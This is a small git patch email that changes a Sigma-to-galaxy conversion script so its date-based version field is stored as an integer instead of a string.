From: Alexandre Dulaunoy Date: Fri, 13 Jan 2023 16:38:56 +0100 Subject: [PATCH 13/13] fix: [sigma] version must be an int --- tools/sigma/sigma-to-galaxy.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigma-to-galaxy.py b/tools/sigma/sigma-to-galaxy.py index ef912e6..50b8e50 100644 --- a/tools/sigma/sigma-to-galaxy.py +++ b/tools/sigma/sigma-to-galaxy.py @@ -127,7 +127,7 @@ def create_cluster(uuidGalaxy=unique_uuid): :return cluster: Dict with the basic information needed for the JSON file. """ - version = time.strftime("%Y%m%d") + version = int(time.strftime("%Y%m%d")) cluster = { "authors": ["@Joseliyo_Jstnk"], "category": "rules",